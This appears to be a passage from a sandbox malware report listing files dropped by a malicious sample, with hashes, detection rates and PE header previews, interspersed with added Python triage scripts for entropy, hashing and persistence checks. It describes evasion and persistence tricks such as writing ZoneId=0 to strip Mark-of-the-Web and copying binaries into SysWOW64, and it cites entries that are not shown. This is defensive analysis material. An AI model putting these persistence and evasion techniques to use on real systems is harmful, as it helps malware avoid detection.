                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\7063.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):327680
                                                                                                                                                                                                            Entropy (8bit):5.555665914483739
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:QOWFvVSz4X34ToHWGPOeh20XTF2xi69YPUy0ZPv4J3vfrhVggjcGkNIVqI:QO0sMITBsh20XTIp6M5Pv4tX7ITsq
                                                                                                                                                                                                            MD5:3754DB9964B0177B6E905999B6F18FD7
                                                                                                                                                                                                            SHA1:F47B3FCF01C76AF3B174792519D44171413D25AE
                                                                                                                                                                                                            SHA-256:F56B4C870E0B40ED1BF4F1019346F14443BBE8608D6F75ACB92B176D138F74B7
                                                                                                                                                                                                            SHA-512:8BF6439AD6FDC8A8F48F4520FB33A4D69E014BFB70EE3E691DBC611ACA11F1FE2C4B0D3901176455E6D46B8AA661B21C93069E0ABAF78DC93284935E866B29FA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....,._................. ...\......`3.......0....@.................................w...........................................(....................................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data................~..............@....rsrc................"..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8008.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):905216
                                                                                                                                                                                                            Entropy (8bit):7.399713113456654
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8B25.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:MS-DOS executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):557664
                                                                                                                                                                                                            Entropy (8bit):7.687250283474463
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                                                                                                                            MD5:6ADB5470086099B9169109333FADAB86
                                                                                                                                                                                                            SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                                                                                                                            SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                                                                                                                            SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\9874.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):354816
                                                                                                                                                                                                            Entropy (8bit):7.859676161369944
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:ezBkLL2NTBY2j1gmB0cR8zGnIu4TBJCb2WefmJwJS6jbMXC3DvMk7y:eKyNTa25ccRPIu49JmYt3jbM/
                                                                                                                                                                                                            MD5:DF7952A5FC82DFB2E49AE81B6A1BE135
                                                                                                                                                                                                            SHA1:4F3A8CD939FBE37426EFDA7C88FBD2E49D8F8986
                                                                                                                                                                                                            SHA-256:F04B77C60C896B33ED8FE286DE3341FC3FFD0211A987435475DC7E9D0ABCB0CC
                                                                                                                                                                                                            SHA-512:96A495E5D30E66A236C0AEA19DAEDF95B31F254E457647B6553F2D6CAE117F0A6DA2468550333FBAE3FFA94D0960E2459D2259D3B4C2598EFE49FC03E6C36F1A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....^............... ....@.........................................................................ta..........4...........................................................................hd..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3... ...4..................@..@.data...$....`.......@..............@....rsrc...4............R..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\A8FB.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):313344
                                                                                                                                                                                                            Entropy (8bit):5.397613918503412
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:ioeQ4Ktj7h8X34vZHWVMC5QNPoT7iilkIexZ41BorVggjcGkNIVqI:recF4Iv0VM457i6E7ITsq
                                                                                                                                                                                                            MD5:2650E6FA017E57264E55CB0078639A13
                                                                                                                                                                                                            SHA1:8677721B6968EA494C69DFFE61E0E34FAF166EB6
                                                                                                                                                                                                            SHA-256:A004E459F0B6F2103369F14E80E3BCD7B16098AFAC311A5C42B5C72E61492475
                                                                                                                                                                                                            SHA-512:1D793F7CAF1AEC58EA24F173984C8BDC4891E93B5F07FC743C4921EF553520CCE80DDC8AC10E0F8A36CFBE190EEAE012C8FA8A9FB8963BF4EB666469C3049C63
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....H._................. ...$......`3.......0....@..........................@......?...........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...8........l...~..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
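The per-file fields above (size, 8-bit entropy, MD5/SHA hashes) and the hex previews give a triage analyst three quick signals: a whole-file entropy close to 8.0 (6674.exe, which the report marks Encrypted:true), section names that are not compiler defaults (the `.T3QbYgM` and `.adata` sections visible in the 6674.exe preview), and a DOS stub without the usual "This program cannot be run in DOS mode" text (8B25.exe, which `file` classifies only as "MS-DOS executable"). The script below is an added example, not Joe Sandbox code, that recomputes those fields for a file and flags the three conditions. The 7.9 entropy threshold and the list of "standard" section names are my assumptions (the report does not document its own Encrypted threshold); the minimal PE it builds is constructed inline so the script runs offline.

```python
import hashlib
import math
import struct
from collections import Counter

# Section names that common Windows toolchains emit; anything else is worth a
# second look. Assumption for this example, not an authoritative list.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".didata", ".CRT", "code"}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, i.e. the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA256/SHA512 in the upper-case form the report prints."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def pe_sections(data: bytes):
    """Parse the section table; return [(name, vsize, rawsize, rawbytes)] or None if not PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + size_opt            # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40                    # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append((name, vsize, rawsize, data[rawptr:rawptr + rawsize]))
    return sections


def triage(data: bytes, packed_threshold: float = 7.9) -> dict:
    """Recompute the report's fields and flag the three signals discussed above."""
    result = {"size": len(data), "entropy": shannon_entropy(data), **hashes(data),
              "is_pe": False, "dos_stub_message": False, "sections": [], "flags": []}
    if result["entropy"] >= packed_threshold:
        result["flags"].append("high-entropy file (packed/encrypted?)")
    sections = pe_sections(data)
    if sections is None:
        if data[:2] == b"MZ":
            result["flags"].append("MZ header but no valid PE header")
        return result
    result["is_pe"] = True
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # A stock linker stub carries this string; a custom stub (as in 8B25.exe) does not.
    result["dos_stub_message"] = b"This program cannot be run in DOS mode" in data[:e_lfanew]
    if not result["dos_stub_message"]:
        result["flags"].append("non-standard DOS stub")
    for name, vsize, rawsize, raw in sections:
        sec_entropy = shannon_entropy(raw)
        result["sections"].append({"name": name, "vsize": vsize,
                                   "rawsize": rawsize, "entropy": sec_entropy})
        if name not in STANDARD_SECTIONS:
            result["flags"].append(f"non-standard section name {name!r}")
        if sec_entropy >= packed_threshold:
            result["flags"].append(f"high-entropy section {name!r}")
    return result


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 (not a real sample): a benign .text section and a
    section with a made-up name filled with maximum-entropy bytes."""
    buf = bytearray(0x400)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)                      # e_lfanew
    stub = b"This program cannot be run in DOS mode.\r\n$"
    buf[0x40:0x40 + len(stub)] = stub
    pe = 0x80
    buf[pe:pe + 4] = b"PE\0\0"
    # COFF header: i386, 2 sections, SizeOfOptionalHeader=0xE0, EXECUTABLE|32BIT
    struct.pack_into("<HHIIIHH", buf, pe + 4, 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    struct.pack_into("<H", buf, pe + 24, 0x10B)                  # PE32 magic
    table = pe + 24 + 0xE0
    sections = [(b".text", 0x200, bytes([0x90]) * 0x100),
                (b".T3QbYgM", 0x300, bytes(range(256)))]
    for i, (name, rawptr, payload) in enumerate(sections):
        off = table + i * 40
        buf[off:off + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", buf, off + 8, len(payload), 0x1000 * (i + 1),
                         len(payload), rawptr)
        buf[rawptr:rawptr + len(payload)] = payload
    return bytes(buf)


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Run it against a real dropped file with `triage(open(path, "rb").read())`; the hashes and entropy should match the report's fields exactly, and the per-section entropies tell you which section carries the packed payload, which a whole-file figure alone cannot.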
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):537088
                                                                                                                                                                                                            Entropy (8bit):5.840438491186833
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                                                                                                            MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                            SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                                                                                                                            SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                                                                                                            SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\szdcdkt.exe
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\A8FB.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14635008
                                                                                                                                                                                                            Entropy (8bit):6.362637600237045
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:2JF4Iv4Ni6E7070707070707070707070707070707070707070707070707070j:eF4Iv4Ni
                                                                                                                                                                                                            MD5:F23C1D7C6806E4BFAA8ABAD7CCC77AC1
                                                                                                                                                                                                            SHA1:2EC703653583A824814910985FA858CE464A1847
                                                                                                                                                                                                            SHA-256:77910D7DDF21BEB55CEABBAA66733A0AB89E7A6ACCD1474207F38AE7E793EFCE
                                                                                                                                                                                                            SHA-512:8DD2A8421137E98CD1C64EC1FF1E54D247A93D6573D1CADFAF332693481ECFF5E48021CB3623FF801366D4763DC20E2A4F93ECF72F90198CB04D8B4A1DE5A6FB
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....H._................. ...$......`3.......0....@..........................@......?...........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...8........l...~..............@....rsrc........`...f..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\ujhcrda
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):284672
                                                                                                                                                                                                            Entropy (8bit):5.09851739034015
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:AbxI6T6jY7wdRLjumseo44+9acMUpK5XVFR5+zcXXGO1Z6S9daWrxpzbgqru:AbxRx4d8XVFn7W6/muzbgwu
                                                                                                                                                                                                            MD5:EB023C854D3C8A24589E9294FD5D346E
                                                                                                                                                                                                            SHA1:699EB8E25FCD583774381B9FF554C7E8442C8C43
                                                                                                                                                                                                            SHA-256:B602AFD3F94C5820291F8319B23F20E5254212BA6AAB49BE0238D7067CACA7B8
                                                                                                                                                                                                            SHA-512:9D20183622A2BA8E59FD6FC3F8F361DA2C258D040EDE68844ED65303E3EE1AAA5B4DF1C6A2AF13A1A0162FAAB9C23C4577963EF4B5F2601AE8516D26B0E96B17
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L......_.................$...........4.......@....@.........................................................................hv..(....... ............................A..............................@i..@............@...............................text...#".......$.................. ..`.rdata..2?...@...@...(..............@..@.data...x........"...h..............@....rsrc... ...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\ujhcrda:Zone.Identifier
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                            C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe (copy)
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14635008
                                                                                                                                                                                                            Entropy (8bit):6.362637600237045
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:2JF4Iv4Ni6E7070707070707070707070707070707070707070707070707070j:eF4Iv4Ni
                                                                                                                                                                                                            MD5:F23C1D7C6806E4BFAA8ABAD7CCC77AC1
                                                                                                                                                                                                            SHA1:2EC703653583A824814910985FA858CE464A1847
                                                                                                                                                                                                            SHA-256:77910D7DDF21BEB55CEABBAA66733A0AB89E7A6ACCD1474207F38AE7E793EFCE
                                                                                                                                                                                                            SHA-512:8DD2A8421137E98CD1C64EC1FF1E54D247A93D6573D1CADFAF332693481ECFF5E48021CB3623FF801366D4763DC20E2A4F93ECF72F90198CB04D8B4A1DE5A6FB
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....H._................. ...$......`3.......0....@..........................@......?...........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...8........l...~..............@....rsrc........`...f..................@..@........................................................................................................................................................................................................................................................................................................................................................................
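The entries above are the part of this report an analyst reads for persistence: the submitted sample reappears byte-for-byte as C:\Users\user\AppData\Roaming\ujhcrda (same MD5/SHA1/SHA-256), szdcdkt.exe is copied from %TEMP% into C:\Windows\SysWOW64\uuqefjyt\ by cmd.exe, and explorer.exe writes a Zone.Identifier stream with ZoneId=0 next to the Roaming copy, which marks the file as local-machine rather than Internet origin. The script below is an added example, not part of the report or of Joe Sandbox: it parses the Key:Value lines of this section into records and runs those three checks. The input is a constructed, trimmed copy of four entries from this page; SAMPLE_SHA256 is assumed to be the submitted sample's hash and should be taken from the report's General Information when the script is reused.

```python
"""Triage the "Dropped Files" entries of a Joe Sandbox report (added example).

Finds (a) dropped files that are byte-identical to each other, (b) copies of
the submitted sample itself, (c) Zone.Identifier streams written with
ZoneId=0, and (d) PE images written into profile/system directories.
"""
import re
from collections import defaultdict

# Field names exactly as the report renders them; any other non-blank line is
# taken to be the path of the next dropped file.
FIELD_RE = re.compile(
    r"^(Process|File Type|Category|Size \(bytes\)|Entropy \(8bit\)|Encrypted|"
    r"SSDEEP|MD5|SHA1|SHA-256|SHA-512|Malicious|Antivirus|Reputation|Preview):(.*)$"
)

# Assumption: the submitted sample's SHA-256 (take it from General Information).
SAMPLE_SHA256 = "B602AFD3F94C5820291F8319B23F20E5254212BA6AAB49BE0238D7067CACA7B8"

# Constructed input: four entries from this section, most fields and the long
# previews trimmed. Paths and hashes are as listed on the page.
SAMPLE_REPORT = r"""
C:\Users\user\AppData\Local\Temp\szdcdkt.exe
Process:C:\Users\user\AppData\Local\Temp\A8FB.exe
MD5:F23C1D7C6806E4BFAA8ABAD7CCC77AC1
SHA-256:77910D7DDF21BEB55CEABBAA66733A0AB89E7A6ACCD1474207F38AE7E793EFCE
Malicious:true
Preview: MZ......................@.....PE..L....H._...
C:\Users\user\AppData\Roaming\ujhcrda
Process:C:\Windows\explorer.exe
MD5:EB023C854D3C8A24589E9294FD5D346E
SHA-256:B602AFD3F94C5820291F8319B23F20E5254212BA6AAB49BE0238D7067CACA7B8
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview: MZ......................@.....PE..L......_...
C:\Users\user\AppData\Roaming\ujhcrda:Zone.Identifier
Process:C:\Windows\explorer.exe
File Type:ASCII text, with CRLF line terminators
Malicious:true
Preview: [ZoneTransfer]....ZoneId=0
C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe (copy)
Process:C:\Windows\SysWOW64\cmd.exe
MD5:F23C1D7C6806E4BFAA8ABAD7CCC77AC1
SHA-256:77910D7DDF21BEB55CEABBAA66733A0AB89E7A6ACCD1474207F38AE7E793EFCE
Malicious:true
Preview: MZ......................@.....PE..L....H._...
"""


def parse_dropped_files(text):
    """Return one dict per dropped file, keyed by the report's field names."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = FIELD_RE.match(line)
        if not m and not line.startswith("\u2022"):
            rec = {"Path": line}              # a bare path starts a new record
            records.append(rec)
        elif rec is None:
            continue                          # field before any path: truncated entry
        elif m:
            key, val = m.group(1), m.group(2).strip()
            rec[key] = [] if key == "Antivirus" else val
        else:                                 # "• Antivirus: ..." bullet under Antivirus
            rec.setdefault("Antivirus", []).append(line[1:].strip())
    return records


def duplicate_groups(records):
    """{sha256: [paths]} for every hash that appears under more than one path."""
    by_hash = defaultdict(list)
    for r in records:
        if "SHA-256" in r:
            by_hash[r["SHA-256"].upper()].append(r["Path"])
    return {h: p for h, p in by_hash.items() if len(p) > 1}


def sample_copies(records, sample_sha256=SAMPLE_SHA256):
    """Paths whose content is the submitted sample itself (its persistence copies)."""
    return [r["Path"] for r in records if r.get("SHA-256", "").upper() == sample_sha256.upper()]


def zone_id_zero(records):
    """Files whose Zone.Identifier stream says ZoneId=0 (Local Machine zone).
    A download carries ZoneId=3 (Internet); writing 0 strips the Mark-of-the-Web
    that SmartScreen and Office Protected View key on."""
    hits = []
    for r in records:
        if r["Path"].lower().endswith(":zone.identifier"):
            m = re.search(r"ZoneId=(\d+)", r.get("Preview", ""))
            if m and m.group(1) == "0":
                hits.append(r["Path"].rsplit(":", 1)[0])   # strip the stream name
    return hits


SUSPECT_DIRS = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\syswow64\\", "\\system32\\")


def pe_drops(records):
    """(path, writing process) for PE images (preview starts with MZ) written
    under profile or system directories, so the writer of each stage is visible."""
    return [(r["Path"], r.get("Process", "?")) for r in records
            if r.get("Preview", "").startswith("MZ")
            and any(d in r["Path"].lower() for d in SUSPECT_DIRS)]


if __name__ == "__main__":
    recs = parse_dropped_files(SAMPLE_REPORT)
    print("copies of the sample:", sample_copies(recs))
    print("identical drops:", duplicate_groups(recs))
    print("ZoneId=0 written for:", zone_id_zero(recs))
    for path, proc in pe_drops(recs):
        print(f"PE written by {proc}: {path}")
```

The same parser runs over the full section if it is pasted into SAMPLE_REPORT; the only format assumption is that each entry begins with a bare path line and that field names appear as rendered here.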
C:\Windows\appcompat\Programs\Amcache.hve
  Process: C:\Windows\SysWOW64\WerFault.exe
  File Type: MS Windows registry file, NT/2000 or above
  Category: dropped
  Size (bytes): 1572864
  Entropy (8bit): 4.213486179721548
  Encrypted: false
  SSDEEP: 12288:7dZYndbynSGWE6tqcojKt2Mr94xHkZIxa7V7v2E1IcBnKiJQqwz8ku:BZYndbynSGB6tq41h2aK
  MD5: 313CF8C27BC5DDA4CB242376B4732F0E
  SHA1: D7F171568C1E393961C0C1FF820DDA9FE9AF79D9
  SHA-256: 53C6C4ADCAD4E2B98FB4573938E6DE0E9EBA3D6C95ED53968CD315B91B682540
  SHA-512: E38AD7E812012D9695AACEC8DAAF8499113A37D2D28F320495B8D6D025932A495A7E6ABCC02EBE245CAC9A9779A6A45D0F6EF08D5CF041F34C8187DBCEDF768C
  Malicious: false
  Reputation: unknown
  Preview: regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmz@~r................................................................................................................................................................................................................................................................................................................................................".u/........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1
  Process: C:\Windows\SysWOW64\WerFault.exe
  File Type: MS Windows registry file, NT/2000 or above
  Category: dropped
  Size (bytes): 20480
  Entropy (8bit): 3.45981995129144
  Encrypted: false
  SSDEEP: 384:9215sxIpnc8fTVgGUKZX7mnnOpuvU87WK:ULCSc8bVgG/ZXSnnO187W
  MD5: 7C72645B82F488776CDCB444EC1BA98B
